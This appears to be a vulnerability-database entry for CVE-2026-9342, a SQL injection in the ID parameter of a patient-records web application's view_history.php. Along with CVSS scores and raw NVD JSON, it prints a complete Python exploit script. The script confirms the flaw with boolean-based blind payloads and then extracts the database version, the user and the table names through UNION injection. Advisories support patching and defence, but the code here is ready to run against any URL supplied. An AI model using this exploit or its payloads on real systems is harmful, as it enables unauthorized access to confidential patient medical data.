Security Vulnerability Report
中文
CVE-2026-9342 CVSS 6.3 MEDIUM

CVE-2026-9342

Published: 2026-05-23 23:16:45
Last Modified: 2026-05-26 18:56:13

Description

A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. Impacted is an unknown function of the file /admin/patients/view_history.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SourceCodester Hospitals Patient Records Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-9342 SQL Injection PoC # Target: SourceCodester Hospitals Patient Records Management System 1.0 # Endpoint: /admin/patients/view_history.php def exploit_sqli(target_url, payload): """ SQL Injection exploitation function Tests for boolean-based blind SQL injection """ params = { 'id': payload } try: response = requests.get(target_url, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def test_injection(target_url): """ Test if the target is vulnerable to SQL injection """ # Original request (normal response) normal_payload = "1" normal_response = exploit_sqli(target_url, normal_payload) # True condition payload (should return normal data) true_payload = "1' AND 1=1 --" true_response = exploit_sqli(target_url, true_payload) # False condition payload (should return different response) false_payload = "1' AND 1=2 --" false_response = exploit_sqli(target_url, false_payload) # Check if vulnerability exists if normal_response != false_response and true_response == normal_response: print("[+] Target is VULNERABLE to SQL Injection!") return True else: print("[-] Target may not be vulnerable") return False def extract_database_info(target_url): """ Extract database information using UNION-based injection """ # Database version extraction payload version_payload = "1' UNION SELECT NULL,version(),user(),database() --" print(f"[*] Extracting database info with payload: {version_payload}") response = exploit_sqli(target_url, version_payload) if response: print("[+] Database information extracted") print(response[:500]) # Extract tables payload tables_payload = "1' UNION SELECT NULL,table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database() --" print(f"\n[*] Extracting tables with payload: {tables_payload}") response = exploit_sqli(target_url, tables_payload) if response: print("[+] Database tables extracted") print(response[:500]) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2026_9342_poc.py <target_url>") print("Example: python cve_2026_9342_poc.py http://target.com/admin/patients/view_history.php") sys.exit(1) target = sys.argv[1] print(f"[*] Testing CVE-2026-9342 on {target}") if test_injection(target): print("\n[*] Extracting sensitive data...") extract_database_info(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9342", "sourceIdentifier": "[email protected]", "published": "2026-05-23T23:16:45.143", "lastModified": "2026-05-26T18:56:13.353", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. Impacted is an unknown function of the file /admin/patients/view_history.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/july-skyload/exp/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/812834", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365305", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365305/cti", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]"}]}}